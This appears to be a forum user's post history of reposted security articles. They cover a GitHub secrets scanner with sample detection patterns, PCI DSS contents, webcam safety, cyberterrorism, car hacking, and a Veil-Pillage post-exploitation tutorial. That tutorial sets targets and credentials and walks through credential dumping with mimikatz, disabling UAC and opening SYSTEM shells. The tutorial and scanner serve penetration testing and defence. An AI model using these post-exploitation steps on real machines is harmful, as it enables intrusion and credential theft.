Everything posted by Aerosol
-
Free online code repositories such as GitHub provide a valuable collaboration service for enterprise developers. But it’s also a trove of potentially sensitive company and project information that’s likely to warrant attention from hackers. An application security specialist from Berlin has developed a tool he hopes can keep companies a step ahead.

Gitrob is an open source intelligence command-line tool that mines GitHub for files belonging to an organization and runs them against pre-determined patterns, looking for potentially sensitive information that isn’t meant for public consumption. Its developer, Michael Henriksen, who does application security and code auditing for SoundCloud, says Gitrob starts off by using GitHub’s public API to query a GitHub organization’s list of public members.

“When the list of members is obtained, it queries GitHub again for each member, which returns a list of their public repositories,” Henriksen told Threatpost. “The contents of the repositories are never downloaded to the machine; it simply uses GitHub’s API again to obtain a list of file names. When clicking on a file in the web interface to see its contents, it is fetched from GitHub’s servers.”

Henriksen said he has built a number of Observers, which act as Gitrob plug-ins, that flag files matching certain patterns. Organization members, repositories and files are saved to a PostgreSQL database for analysis before a Sinatra web server is started locally in order to serve a web app that presents the data for analysis, which must be conducted manually.

“All the files are sent through these observers, one by one, and the observers can then decorate or make changes to the file’s database record before it is saved to the database,” Henriksen said. “Right now, Gitrob actually only contains one observer, which will flag files that match patterns of interesting files, but the design makes it easy to introduce new logic to look for other things. The patterns are built into the tool itself.”

Security analysts inside an enterprise should feel at home using Gitrob, Henriksen said, but he cautioned that the tool will point out a default set of potentially sensitive items. An analyst would have to manually comb through them to determine whether those files should be public.

“A security team in an organization can use Gitrob to periodically scan their repositories for sensitive files that might be checked in,” Henriksen said. “The current version is not really suitable to run in an automated fashion, so it would have to be run manually, but I am planning to change that in the future so that it can be run automatically and report to somewhere when new things are found.”

Henriksen said he tested Gitrob against a number of GitHub repositories belonging to companies of different sizes; he found a variety of information using Gitrob, from username-password combinations and email addresses to internal system mappings and other information that could be used in phishing campaigns or other social engineering attacks. Henriksen said he notified affected organizations; most were appreciative, he said.

“I am not aware of any tool that specifically targets GitHub organizations like Gitrob does,” Henriksen said. “People have been finding sensitive files with GitHub’s search functionality for a while (kind of like Google dorks for GitHub), but I think Gitrob is the first tool that makes the task of finding sensitive files within an organization very easy.”

Installation instructions and requirements can be found on his GitHub page.

Source
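The observer pipeline the article describes (file records passed through plug-ins that flag or decorate them before storage) can be sketched in a few dozen lines. The code below is an added example written for this page, not Gitrob's own code; the file-name patterns, the fixture-directory check and the sample repository listing are all assumptions constructed for the example, standing in for the file lists Gitrob fetches through GitHub's API.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Tuple


@dataclass
class FileRecord:
    """One file-name entry from a repository listing (contents never fetched)."""
    org: str
    repo: str
    path: str
    flags: List[str] = field(default_factory=list)


# Illustrative pattern set, assumed for this example; Gitrob's built-in
# patterns are not reproduced on the page.
INTERESTING_PATTERNS: List[Tuple[str, re.Pattern]] = [
    ("ssh_private_key", re.compile(r"(^|/)id_(rsa|dsa|ecdsa|ed25519)$")),
    ("key_material", re.compile(r"\.(pem|key|p12|pfx|jks)$", re.IGNORECASE)),
    ("dotenv", re.compile(r"(^|/)\.env(\.[\w-]+)?$")),
    ("shell_history", re.compile(r"(^|/)\.(bash|zsh|sh)_history$")),
    ("credential_store", re.compile(
        r"(^|/)(\.htpasswd|\.netrc|credentials|secrets?\.(ya?ml|json))$",
        re.IGNORECASE)),
]


class SensitiveFileObserver:
    """Observer that tags a record with every pattern its path matches."""

    def __init__(self, patterns=INTERESTING_PATTERNS):
        self.patterns = patterns

    def observe(self, record: FileRecord) -> FileRecord:
        for name, pattern in self.patterns:
            if pattern.search(record.path):
                record.flags.append(name)
        return record


class FixturePathObserver:
    """Second observer: mark paths under test/fixture directories so the
    manual review the article calls for can triage likely test data first
    (placeholder keys in fixtures are a common false positive)."""
    FIXTURE_DIR = re.compile(r"(^|/)(tests?|spec|fixtures?|examples?|testdata)/")

    def observe(self, record: FileRecord) -> FileRecord:
        if self.FIXTURE_DIR.search(record.path):
            record.flags.append("in_test_fixture_dir")
        return record


DEFAULT_OBSERVERS = [SensitiveFileObserver(), FixturePathObserver()]


def scan(org: str, listing: Dict[str, List[str]], observers) -> List[FileRecord]:
    """Run every file of every repo through the observers in order and keep
    the records that picked up at least one sensitivity flag."""
    flagged = []
    for repo, paths in listing.items():
        for path in paths:
            record = FileRecord(org, repo, path)
            for observer in observers:
                record = observer.observe(record)
            if any(f != "in_test_fixture_dir" for f in record.flags):
                flagged.append(record)
    return flagged


# Constructed sample listing (repo name -> file paths), as the API would return it.
SAMPLE_LISTING = {
    "web-app": ["README.md", "config/.env.production", "src/app.rb",
                "tests/fixtures/.env"],
    "infra": ["deploy/id_rsa", "deploy/certs/server.pem", "Makefile"],
    "docs": ["index.html", "images/logo.png"],
}


def run_sample() -> Dict[str, List[str]]:
    """Scan the constructed listing; returns {path: flags} for flagged files."""
    return {r.path: r.flags for r in scan("example-org", SAMPLE_LISTING, DEFAULT_OBSERVERS)}


if __name__ == "__main__":
    for path, flags in run_sample().items():
        print(f"{path}: {', '.join(flags)}")
```
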
-
Table of Contents

Document Changes
Introduction and PCI Data Security Standard Overview
PCI DSS Resources
PCI DSS Applicability Information
Relationship between PCI DSS and PA-DSS
  Applicability of PCI DSS to PA-DSS Applications
  Applicability of PCI DSS to Payment Application Vendors
Scope of PCI DSS Requirements
  Network Segmentation
  Wireless
  Use of Third-Party Service Providers / Outsourcing
Best Practices for Implementing PCI DSS into Business-as-Usual Processes
For Assessors: Sampling of Business Facilities/System Components
Compensating Controls
Instructions and Content for Report on Compliance
PCI DSS Assessment Process
Detailed PCI DSS Requirements and Security Assessment Procedures
  Build and Maintain a Secure Network and Systems
    Requirement 1: Install and maintain a firewall configuration to protect cardholder data
    Requirement 2: Do not use vendor-supplied defaults for system passwords and other security parameters
  Protect Cardholder Data
    Requirement 3: Protect stored cardholder data
    Requirement 4: Encrypt transmission of cardholder data across open, public networks
  Maintain a Vulnerability Management Program
    Requirement 5: Protect all systems against malware and regularly update anti-virus software or programs
    Requirement 6: Develop and maintain secure systems and applications
  Implement Strong Access Control Measures
    Requirement 7: Restrict access to cardholder data by business need to know
    Requirement 8: Identify and authenticate access to system components

Read more: https://www.pcisecuritystandards.org/documents/PCI_DSS_v3.pdf
-
The recent revelations about a Russian website offering links to various live streaming web cameras and baby monitors have made people truly petrified of using such gadgets. However treacherous it might sound, the truth is that the best advice to all users who have suddenly decided to stop benefiting from the cool features of web cams is not to give them up altogether. Instead, the best thing for somebody to do is to learn as many details as possible on webcam safety. In this way, everyone will be able to enjoy the pros of these devices without worrying about their cons.

The Information Commissioner’s Office has published a blog post commenting on the vigilance of people, which is crucial towards empowering their defensive line against hacks and potential threats online. The post was written by Simon Rice, Group Manager for Technology, explaining the basic guidelines that everyone should follow on the subject. We are going to dig a little deeper and try to fully comprehend what leads to security breaches in our webcams and how we can prevent webcam hacking effectively. It does not require any special knowledge or expertise to get thorough protection against the dangers of the web. So, let’s get started!

Why Access is Granted to Webcams

It is true that webcams are connected to the Internet, just like many other devices and even household appliances. The Internet of Things has been increasing in popularity and therefore we are directly connected to the web and have our devices monitored remotely, thanks to wireless Internet connections. Now, the most important thing to keep in mind is the fact that even hackers need your login information in order to reach out to your webcam. It is saddening how many people continue using the default login info sent out by the manufacturers of each webcam. In this way, the hacker can easily circumvent the security layering beneath a commonly used password and username. It could be easier for people to be forced to change this login information after setting up, but unfortunately there is no such necessity; this leads to many cases of webcams having poor login data and hackers being in a truly beneficial position.

Do I Need to Dispose of Webcams?

In pursuit of digital safety, it makes total sense why many people have thought of throwing their webcams away. Others have placed plaster or pieces of fabric on the cameras that are installed on their laptops or other devices. However, you do not need to be that drastic to maintain your peace of mind. It is truly advisable, though, that you level up your protection and think twice prior to engaging in something that may lead to your device being compromised. Below, we are going to have a closer look at the details that make a huge difference and result in having your webcam shielded properly.

Keep Your Webcam Safe Online

Be Considerate about Passwords: We have stated above that you need to change the default password and username of your webcam after it’s been shipped. Still, this does not automatically make you impenetrable to hackers. You need to be really considerate when it comes to choosing the proper password. Do not use passwords that can be easily guessed or passwords that include information linking back to you. Use strong passwords that differ from those of your other accounts. In addition, you should in no way reveal those passwords via email, SMS or, of course, on the phone. Last but not least, be sure to update your passwords on a regular basis and check for two-step authentication.

Set up Different User Accounts: If there are many people using a specific computer, set up different user accounts that lead to the respective data of each user. In this way, you eliminate the chances of having the whole computer compromised, and you rest assured that everyone has access only to the things that matter to them, without digging into other stuff.

Be Realistic: Do not place a webcam in your children’s bedroom and do not expose things that you wish to conceal to your webcam. As a result, even if somebody succeeds in accessing your webcam, no actual harm will be done. Check for any indication that your webcam is on, so as to identify the hacking promptly and initiate management of the damage.

Engage in Security Software: It is imperative that you have installed the latest version of your anti-virus software and any additional security software of value. Be sure to run regular scans to determine whether malware has been installed on your computer and requires your attention. Securing your webcam from hackers means that you are always alert to the latest threats in Trojan malware and other viruses and spyware. A firewall is also a must-have for you, in avoidance of any serious trouble.

Adjust Webcam Security Settings: As soon as you have received your webcam and are about to install it, read through the manual and get to the security settings of the product. This will allow you to see whether or not there is an option of turning remote viewing off. Upon doing so, you instantly make things more difficult for hackers who would otherwise be prompt to intercept your footage. There may be other cool security settings you can play with, so do not overlook this step.

Beware of Techies: Sometimes wolves come in sheep’s clothing and thus you need to be scholastic with techies offering their help to your computer. Their interest may be genuine; however, there is a chance that they are mainly interested in hacking your system and gaining remote access to your webcam. Is it worth the risk? We think not!

Avoid Suspicious Attachments and Links: Since your email is the most vulnerable and weakest link in the chain of the Internet, you ought to be wary of any attachment or link sent over to you. Especially when the email comes from an untrustworthy source, this is definitely a red flag for you to watch out for. Double check the sender and make sure that you only click on secured data.

If you follow the instructions displayed above and pay adequate attention toward enhancing your webcam safety, you will have no problem and you will still be able to reap the benefits of your precious gadgets. You do not have to deprive yourself of anything, as long as you consider the threats that come with it and you are determined to deal with them efficiently.

Source
-
While a terrorist using the Internet to bring down the critical infrastructures the United States relies on makes an outstanding Hollywood plot, there are flaws in the execution of this storyline as an actual terrorist strategy. Conway (2011) calls out three limitations on using cyber-related activities for terrorists: technological complexity, image, and accident (Against Cyberterrorism, 2011, p. 27). Each is important to consider.

While critical infrastructures may make a tempting target and threat actor capabilities are certainly increasing (Nyugan, 2013), it is a complicated process to attack something of that magnitude. It is precisely the interconnectedness of these two disparate parts that makes them a target, however. Nyugan (2013) calls them cyber-physical systems (CPS): “A physical system monitored or controlled by computers. Such systems include, for example, electrical grids, antilock brake systems, or a network of nuclear centrifuges” (p. 1084). In Verton’s (2003) imaginary narrative, the target of the Russian hackers, the SCADA system, is a CPS. However, Lewis (2002) argues the relationship between vulnerabilities in critical infrastructures (such as MAE-East) and computer network attacks is not as clear cut as first thought (p. 1). It is not simply a matter of having a computer attached to a SCADA system such that the system can now be turned off and society goes into a free fall of panic and explosions and mass chaos.

The first idea Conway (2011) posits reduces to the notion that information technology is difficult in most cases. There are reasons it takes veritable armies of engineers and analysts to make these complex systems interact and function as intended. However, there are a limited number of terrorists with the necessary computer skills to conduct a successful attack (pp. 27-28). Immediately the argument turns to hiring external assistance from actual computer hackers (as most journalists and Hollywood scriptwriters do). Conway (2011) dismisses that idea, correctly, as a significant compromise of operational security (p. 28). The US Department of Defense defines operational security, or OPSEC, as: A process of identifying critical information and analyzing friendly actions attendant to military operations and other activities to: identify those actions that can be observed by adversary intelligence systems; determine indicators and vulnerabilities that adversary intelligence systems might obtain that could be interpreted or pieced together to derive critical information in time to be useful to adversaries, and determine which of these represent an unacceptable risk; then select and execute countermeasures that eliminate the risk to friendly actions and operations or reduce it to an acceptable level (US Department of Defense, 2012). In the context of this paper, letting outside profit-motivated technicians into the planning and execution phase of a terrorist plot would be risky for conservative-minded individuals such as religious terrorists (Hoffman, 2006). As the number of people who are aware of a plot increases, the potential number of people who can leak operational details of the plot increases exponentially. It is for this reason Verton’s (2003) scenario is most improbable.

The second concern Conway (2011) notes is one of audience. Recalling the definition of terrorist put forth by Hoffman (2006), terrorists need to generate publicity to achieve their goals: they need to create a climate of fear through violence or the threat of violence. Simply attacking something and having no one notice it is not an operational success for a terrorist. Terrorists need to have their grievances known (Nacos, 2000, p. 176). The terrorist act needs to be witnessed, such as the planes crashing into the World Trade Center or the hostage taking in Munich, in order to generate the necessary level of discourse to affect the goals the terrorist has in mind. Unfortunately, injecting code into a DNS server or shutting down Amazon.com does not generate the required intensity of chaos modern terrorists require (Conway, Against Cyberterrorism, 2011, p. 28).

This leads to Conway’s (2011) third point: the accident. The United States relies heavily on computer and information systems. However, if a system goes offline in today’s world, users are just as likely to suspect a system failure or accident as anything else (p. 28). As stated previously, this would be unacceptable to the terrorist organization. In order to generate a sufficient amount of concern on the part of the population, a series of cascading cyber-attacks would have to occur. Recalling Conway’s (2011) first concern about complexity, multiple system attacks of the necessary intensity and frequency are unlikely.

While this might appear as merely an academic exercise, a review of the Global Terrorism Database maintained by the National Consortium for the Study of Terrorism and Responses to Terrorism at the University of Maryland shows only two incidents under the search term “cyber” (Global Terrorism Database Search Results). The first involved two men in Morocco who got into an argument at an Internet café with the café owner about viewing bomb-making materials. During the altercation, an actual bomb strapped to one of the men accidentally exploded, killing the would-be bomber and wounding three others. The second involved a pay phone in Hong Kong that was wired with explosives and detonated. A search of telecommunications facilities as targets in the database showed similar results: explosions or arson, not the use of computers as a weapon system.

There are side effects of the mischaracterization of cyberterrorism by the media and popular culture. In the United States, the Uniting (and) Strengthening America (by) Providing Appropriate Tools Required (to) Intercept (and) Obstruct Terrorism Act of 2001, or PATRIOT Act, was passed in the immediate aftermath of the September 11, 2001 attacks. It has two key provisions designed to counter potential cyberterrorist activity and increase the punishment for computer crimes (US Government, 2001). Section 814 of the PATRIOT Act enumerated specifically the goals of deterring and preventing cyberterrorism. It increased the minimum prison terms for unauthorized access to a computer system, regardless of activity once in the system, i.e. mixing criminal activity and cyberterrorism under a cyberterrorism section heading (§ 814.a.4). Additionally, the law amended “the Federal sentencing guidelines to ensure that any individual convicted of a violation of section 1030 of title 18, United States Code, can be subjected to appropriate penalties, without regard to any mandatory minimum term of imprisonment” (§ 814.f). In other words, simply being convicted of unauthorized access to a computer system allowed a federal judge (who most likely was not familiar with the nuances of cyber threats and threat actors) to assume the worst and lock someone up for a very long time.

Outside of the United States, others have made similar decisions regarding cyber threats and the law. In the United Kingdom, Parliament changed its Terrorism Act so that using a computer system or threatening to use a computer system that interferes with or disrupts another computer system is now considered terrorism (Conway, Cyberterrorism: Hype and Reality, 2007, p. 91). Of concern, of course, is who makes the determination as to what constitutes disruption. Right now, that falls to Scotland Yard. That leaves a sour taste and no small amount of anxiety for human rights workers and other civil libertarians (p. 91).

Since the advent of the Internet, life has changed remarkably for citizens of the United States and the world. Unfortunately, this pace of change brings fear. When the legitimate danger terrorists create is married to our dependence on technology, it is understandable how people become concerned. This new sense of panic is the fear of terrorists using the computer systems we depend on against us. Fortunately, the evidence of cyberterrorism is very limited thus far. Of course, an assumption is made that cyberterrorism is properly defined as a non-state organization that creates politically motivated destruction to information, computer systems and/or computer programs leading to violence or the threat of violence (Conway, What is Cyberterrorism?, 2002). Any implication of state-sponsorship of cyber-attacks is outside the scope of this paper and could constitute an act of war (Shiryaev, 2012, p. 150).

An analysis of the issue has demonstrated that cyberterrorism as a strategy for actual terrorists has been over-hyped through the media, academia, and popular literature. This exaggeration of capabilities has led to several instances of questionable law made by people who do not understand the intricacies involved in launching a cyberterrorist attack. Rather, they acted out of fear and doubt. More cybersecurity professionals need to counter such sentiments by the public and public officials to ensure actual threats are mitigated and unsubstantiated ones are given less priority and fewer resources. Only then can the more important threats be dealt with.

Source
-
1. Introduction

In the past, cars and computers did not have many touching points. Nowadays, modern cars contain numerous computers. As Bruce Emaus, the chairman of SAE International, stated: “It would be easy to say the modern car is a computer on wheels, but it’s more like 30 or more computers on wheels.” The complexity of modern cars can be understood by comparing their software with the software used on the space ship (Apollo 11) that put humans on the moon. While Apollo 11 had 145,000 lines of computer code, modern cars have more than 100 million lines of code.

Although in-car computers ensure the comfort and the safety of the occupants of the car, they may be hacked by criminals. Car theft may be one of the reasons for hacking cars. Criminals stealing cars by using hacking methods can hide very well from law enforcement institutions, because they do not leave the evidence that would be left by a forcible entry.

The purpose of this article is to examine the information security vulnerabilities of the following elements of modern cars: door locks (Section 2), in-vehicle infotainment systems (Section 3), MP3 players (Section 4), systems for on-board diagnostics (Section 5), and telematics systems (Section 6). Finally, a conclusion is drawn (Section 7). These five elements of modern cars are displayed on the diagram below.

2. Door locks

The door locks of most modern cars can be opened by a radio frequency remote keyless system. The users of such systems can open the car by pressing a button on a remote control key fob. The first car with a radio frequency remote keyless system was the French Renault Fuego. A radio frequency remote keyless system can be hacked by spoofing the signal from a wireless key fob. In this context, the term “spoofing” refers to emitting a fake signal. It should be noted that hacking of a car by spoofing the signal from a wireless key fob is not a hypothetical threat. Such hacks have already been reported. Below, I provide two examples demonstrating successful hacking of door locks.

Silvio Cesare, a security researcher, invented a technique allowing anyone to spoof the signal from a wireless key fob and unlock the car. The hacking process takes a few minutes. According to Cesare, the technique “effectively defeats the security of the keyless entry.” A video of the hacking process can be found at the following URL: Watch This Wireless Hack Pop a Car's Locks in Minutes | WIRED.

Srdjan Capkun, Aurélien Francillon, and Boris Danev, scientists working for ETH Zurich in Switzerland, successfully opened the door locks of 10 cars by intercepting and relaying signals from the cars. The attack used by them works irrespective of the cryptography and the protocols used by the remote keyless system.

3. In-vehicle infotainment systems

The term “in-vehicle infotainment system” means a collection of hardware devices installed into transportation devices that display navigation and other information and provide audio or video entertainment (e.g., listening to audio files and playing video games). Most in-vehicle infotainment systems allow the user to install mobile applications developed by third parties. In case a mobile app contains malware, it can affect the in-vehicle infotainment system. In this regard, it is worth mentioning that in 2013 there were over one million malicious applications for download on the Android market alone. FAKEINST and OPFAKE were the most popular malware programs. FAKEINST disguises itself as a legitimate program and sends text messages without a user’s permission. OPFAKE also disguises itself as a legitimate program, but, instead of sending text messages, it opens webpages that contain malicious files.

As a response to the threats associated with mobile apps, many car manufacturers decided to allow the users of their cars to install only certain pre-approved apps on the in-vehicle infotainment systems. While such a solution may increase the information security of car users, it significantly restricts consumer choice. Car users may “jailbreak” the in-vehicle infotainment systems in order to remove the restrictions imposed by the car manufacturers. The term “jailbreaking” refers to circumventing security measures of a mobile operating system with the aim of installing unauthorized software.

4. MP3 players

Virtually all modern cars have an MP3 player. The MP3 player can be used by hackers as an entry point for accessing the computers of the other components of the car. The MP3 player is an especially attractive place for hacking attacks because people generally do not consider digital music files as potential carriers of malware. As Stefan Savage, a professor at the University of California, noted, “it’s hard to think of something more innocuous than a song.” Although digital music files are considered by some as “harmless” files, researchers at UCSD and the University of Washington demonstrated hacking of a car MP3 player. By adding code to a digital music file, they were able to infect a song burned to CDR with malware. When played on the car’s MP3 player, the infected song changed the software of the MP3 player in such a way as to allow the hackers to access the other components of the car.

A McDonald’s promotion in Japan is a real-life example of the information security risks associated with digital music files. During the promotion, McDonald’s gave people 10,000 USB-stick MP3 players containing ten free songs. The MP3 players also contained a Trojan horse (QQPass) that was capable of stealing data from the computers of the users. In this case, the infection seems to have been caused by third parties, not by McDonald’s. McDonald’s apologized for the case and set up a help line.

5. Systems for on-board diagnostics

The systems for on-board diagnostics provide the vehicle owner or the technician access to the status of various components of the vehicle. Such access can be obtained by connecting to a port which can be found in the car. The port can be used not only by owners of the car and technicians, but also by hackers willing to infect the computers of the car with malware. Researchers at The Center for Automotive Embedded Systems Security (CAESS) proved such a possibility by installing a malware program onto the car’s CAN bus through the On-Board Diagnostics (OBD-II) port. After the installation, the malware was able to move the windshield wipers and activate the brakes.

In 2012, The Register stated that on-board diagnostics bypass tools were imported into Europe and Australia from China and Eastern Europe. The tools can be used for reprogramming a blank key and stealing a car. David Stupples, a professor at City University London, stated in relation to the tools that: “Crooks only need to monitor a person using the key or interrogate the key fob to get enough information to decipher the key.” In the same context, the Australian Theft Reduction Council chief Ray Carroll pointed out that: “Not long ago insurers were safe in saying a car with an Australian-standard immobiliser that was stolen without the keys was potential fraud. Now you can’t really say that because there’s good evidence where OBDs are able with a bit of black-market software to recode the immobiliser module to a key you’ve brought along.” It should be pointed out that car manufacturers have recently started using encryption in order to prevent information security attacks on the systems for on-board diagnostics.

6. Telematics systems

Telematics systems are in-car electronic systems which can perform various functions, including, but not limited to, disabling the vehicle in case of a theft, notifying the police in the event of a crash, and displaying diagnostic information. By gaining access to the telematics systems, hackers can activate or deactivate the functions of those systems. There are two scenarios of attacks on the telematics systems. In the first scenario, a mechanic installs malware on a telematics system. In the second scenario, a hacker receives unauthorized access to the wireless networks the telematics system is plugged into. A research paper written by computer scientists from the University of Washington and the University of California warns that the second scenario is not merely theoretical. More particularly, the paper states that: “In our car we identified no fewer than five kinds of digital radio interfaces accepting outside input, some over only a short range and others over indefinite distance. While outside the scope of this paper, we wish to be clear that vulnerabilities in such services are not purely theoretical. We have developed the ability to remotely compromise key ECUs in our car via externally-facing vulnerabilities, amplify the impact of these remote compromises using the results in this paper, and ultimately monitor and control our car remotely over the Internet.”

7. Conclusion

At present, there are not many reported cases of hacked cars. However, because hacking of cars may be a relatively simple activity, the number of such cases may significantly increase in the near future. The following quote from the above-mentioned paper clearly indicates the easiness of hacking a car: “In starting this project we expected to spend significant effort reverse-engineering, with non-trivial effort to identify and exploit each subtle vulnerability. However, we found existing automotive systems—at least those we tested—to be tremendously fragile.”

In order to prevent the appearance of car hacking cases, car manufacturers need to implement up-to-date information security measures. These measures will not only protect car users, but also pave the way toward the introduction of new self-driving cars, which will be entirely dependent on technology. The car manufacturers that do not ensure the information security of their cars risk losing significant market share, because car users are seriously worried about the security and privacy of their cars. A Harris Interactive poll indicated in 2012 that 76% of 2,634 respondents consider in-car connectivity a dangerous aspect of modern cars. 55% of the respondents stated that car manufacturers went too far in including interconnected technologies in their vehicles.

* The author would like to thank Rasa Juzenaite for her invaluable contribution to this article.

References

1. Barry, K., ‘Can Your Car Be Hacked: Hack to the Future’, Car and Driver, July 2011. Available at Can Your Car Be Hacked? - Feature - Car and Driver.
2. Brooks, R., ‘Introduction to Computer and Network Security: Navigating Shades of Gray’, CRC Press, 2013.
3. Covert, A., ‘Now Cars Are Vulnerable to Malware’, Gizmodo, 15 March 2011. Available at Now Cars Are Vulnerable to Malware?.
4. Dimov, D., ‘Legality of Jailbreaking Mobile Phones’, InfoSec Institute, 16 December 2014. Available at Legality of Jailbreaking Mobile Phones - InfoSec Institute.
5. Greenberg, A., ‘Watch This Wireless Hack Pop a Car’s Locks in Minutes’, Wired.com, 8 April 2014. Available at Watch This Wireless Hack Pop a Car's Locks in Minutes | WIRED.
6. Ippolito, J., ‘Hack someone’s car with a malicious tune’, NMDnet, 4 February 2011. Available at Hack someone’s car with a malicious tune » UMaine NMDNet.
7. Kelly, G., ‘Report: 97% of Mobile Malware is On Android. This is The Easy Way You Stay Safe’, Forbes, 24 March 2014. Available at Report: 97% Of Mobile Malware Is On Android. This Is The Easy Way You Stay Safe - Forbes.
8. Leyden, J., ‘Got a BMW? Thicko thieves can EASILY NICK IT WITH $30 box’, The Register, 17 September 2012. Available at Got a BMW? Thicko thieves can EASILY NICK IT with $30 box • The Register.
9. Motovalli, J., ‘The Dozens of Computers That Make Modern Cars Go (and Stop)’, New York Times, 4 February 2010. Available at http://www.nytimes.com/2010/02/05/technology/05electronics.html?_r=1& .
10. Naone, E., ‘Car Theft by Antenna: Researchers beat automatic locking and ignition systems’, MIT Technology Review, 6 January 2011. Available at Car Theft by Antenna | MIT Technology Review.
11. O’Connor, F., ‘Survey: Drivers like in-car Internet, worry about safety, privacy’, Computerworld, 2 August 2012. Available at Survey: Drivers like in-car Internet, worry about safety, privacy | Computerworld.
12. Osborne, C., ‘Malicious apps, mobile malware reaches 1 million mark’, ZDNet, 1 October 2013. Available at Malicious apps, mobile malware reaches 1 million mark | ZDNet.
13. Pagliery, J., ‘Your Car is a giant computer – and it can be hacked’, CNN, 2 June 2014. Available at Your car is a giant computer - and it can be hacked - Jun. 1, 2014.
14. Stevens, C., ‘McDonalds’ free Trojan: “Would you like malware with that?”’, CNET, 17 October 2006. Available at McDonalds' free Trojan: "Would you like malware with that?" - CNET.
15. ‘$30 device available online blamed for spike in car thefts in Queensland’, news.com.au, 18 August 2012. Available at $30 device available online blamed for spike in car thefts in Queensland.

Source
-
Veil-Pillage is a part of the Veil-Framework which comes in handy when performing post-exploitation. It consists of a number of modules which can be used to perform different tasks on target machine(s). It has a Metasploit msfconsole-like interface and commands, so you won’t feel alien when using it.

Install the complete Veil-Framework from the following GitHub link: https://github.com/Veil-Framework/Veil

git clone https://github.com/Veil-Framework/Veil.git

After git-clone has completed, go inside the “Veil” directory and run the “update.sh” shell script. It will take some time to download and set up everything. When everything has been set up, go to the “Veil/Veil-Pillage/” directory and run the “Veil-Pillage.py” Python script. Set the target and the login credentials in Veil-Pillage.

set targets 10.0.0.11
set creds Administrator:admin

You can also specify multiple targets and credentials by separating them with a comma (,) in the same line. Set a global value of “lhost“, which is the IP address of the attacking machine, using the below command:

setg lhost 10.0.0.14

At the time of writing this article, there were 7 categories with a total of 60 modules in Veil-Pillage.

Categories and Modules in Veil-Pillage:

Credentials
credentials/autograb
credentials/hashdump
credentials/mimikatz
credentials/powerdump

Enumeration
enumeration/domain/enum_domain
enumeration/domain/group_hunter
enumeration/domain/netview
enumeration/domain/netview_results
enumeration/domain/powerview
enumeration/domain/powerview_results
enumeration/domain/query_domainsid
enumeration/domain/query_group
enumeration/domain/query_users
enumeration/host/credential_validation
enumeration/host/detect_powershell
enumeration/host/detect_powershell_install
enumeration/host/enum_host
enumeration/host/etw_results
enumeration/host/etw_wininet
enumeration/host/user_hunter

Impacket
impacket/psexec_shell
impacket/smb_hostfile
impacket/smb_shell
impacket/smbexec_shell

Management
management/check_uac
management/disable_rdp
management/disable_uac
management/download_file
management/enable_proxy
management/enable_rdp
management/enable_uac
management/force_logoff
management/force_reboot
management/force_shutdown
management/run_command

Payload Delivery
payload_delivery/exe_delivery
payload_delivery/powershell_injector
payload_delivery/powershell_shell
payload_delivery/powershell_stager

Persistence

PowerSploit

Tab completion for modules:

Use “credentials/autograb” to get hashes of users on the victim machine:

Note that “force_method” has been set to none, which means this module will first run using the PowerShell script “autograb.ps1“. If this fails, then it will use the binary technique. You can see that the attacker’s IP address has been set to “10.0.0.14”, which we did earlier using the “setg lhost” command. Press Enter (Option (Y)) to execute the module.

In the above screenshot, the first highlighted area shows that PowerShell has been found on the victim machine and it is being used to execute the AutoGrab module. Then the PowerShell script is downloaded and installed from the second highlighted HTTP path, which is hosted on the attacker machine by Veil-Pillage itself.

After the module has executed, a screen similar to the one below is shown. It shows the location of the file containing the output of the AutoGrab module execution (the file name is a timestamp of module execution). Pressing “y” will show you the output of the command:

This module can be used to dump not just local system hashes but also other hashes and plaintext passwords from memory and publicly known password files. Similar to this module are the “credentials/hashdump” and “credentials/powerdump” modules, which can dump hashes of local system users.

The next module is one of the very popular modules used in the post-exploitation phases of a penetration testing engagement, “credentials/mimikatz“:

Executing the module and waiting for it to complete and get output:

And read the output of the executed module:

The Mimikatz module dumped the login hashes for two logged-in users, “Administrator” and “slave”. One of the biggest advantages of using Mimikatz is that it is executed from memory only, and nothing is written on disk. It can also dump other data like Kerberos tickets if they are stored in memory.

The Enumeration category contains modules using which domain and host enumeration can be performed. It allows an attacker to gather more information about the victim and the infrastructure of which it is part by using the data gathered from it. If you have a collection of login credentials, then “enumeration/host/credential_validation” can be used to validate those credentials against the victim machine. A sample screenshot of the same can be seen below:

If you have a number of hosts, then “set targets target1,target2,target3,…” can be used to set multiple targets along with credentials set using “set creds username1:password1,username2:password2,…“.

Detailed information about the victim machine can be obtained using the “enumeration/host/enum_host” module:

This module accepts an “out_file” option, which allows you to specify the file name in which the output of this module will be stored temporarily on the victim machine. The output of this module after being received on the attacker machine is stored in a text file (not shown on screen because of its huge content):

This text file contains the following information in an organized manner:
ipconfig (network connectivity – IP address, interfaces, etc.)
ARP table
User accounts
Currently logged-in users
Netstat (TCP & UDP)
Currently running processes
System information

Earlier I had mentioned that some modules have an option “force_method” with values none, powershell & binary. To find out if PowerShell is installed and accessible on the victim machine or not, Veil-Pillage has a module “enumeration/host/detect_powershell“. Similar to this module is “enumeration/host/detect_powershell_install”, which only finds out if PowerShell is installed on the victim machine or not.

Two interesting enumeration modules are “enumeration/host/etw_results” and “enumeration/host/etw_wininet“. ETW stands for Event Tracing for Windows and these modules are used to fetch event logs from Windows and to fetch cookies & post parameter data of the Internet Explorer browser only. These modules can prove to be very useful if some sensitive information like authenticated cookies can be fetched from the victim machine. But unfortunately, these modules were not working for me.

Getting an interactive shell from the victim machine can easily be done using the “impacket/psexec_shell” module. Since I have the credentials of the Administrator account on the victim machine, and this module uses psexec, I am getting a highest privileged SYSTEM shell:

This module makes getting an interactive shell ridiculously easy and saves a lot of time when you just want to have a quick shell (which is just a module click away in Veil-Pillage).

Have you ever used the “smbclient” utility, which is used to connect to remote SMB services used to access files and perform other activities? Very similar to that is the next module, “impacket/smb_shell“, which gives an interactive SMB shell on the victim machine. A successful SMB shell is shown below with some sample commands, which show you have full-fledged SMB shell access on the target machine.

Another shell access module is “impacket/smbexec_shell“. This module gives shell access to the victim machine, but is semi-interactive. Being a psexec shell, it gave SYSTEM shell access. It is called semi-interactive for a reason: if you execute a command with very large output like “systeminfo“, it will crash the shell, but the command does get executed on the victim machine. So running a delete-all-files command will get executed on the server if you want to create havoc for no reason.

To make changes or enable/disable settings and some services on the target machine, we have the Management category of Veil-Pillage modules. User Access Control (UAC) is protection implemented in Windows, and you can check if it is enabled on the victim machine or not using the “management/check_uac” module:

As you can see below, on my victim machine it is disabled right now:

UAC can be enabled using the “management/enable_uac” module:

Let us again check UAC status using the “management/check_uac” module:

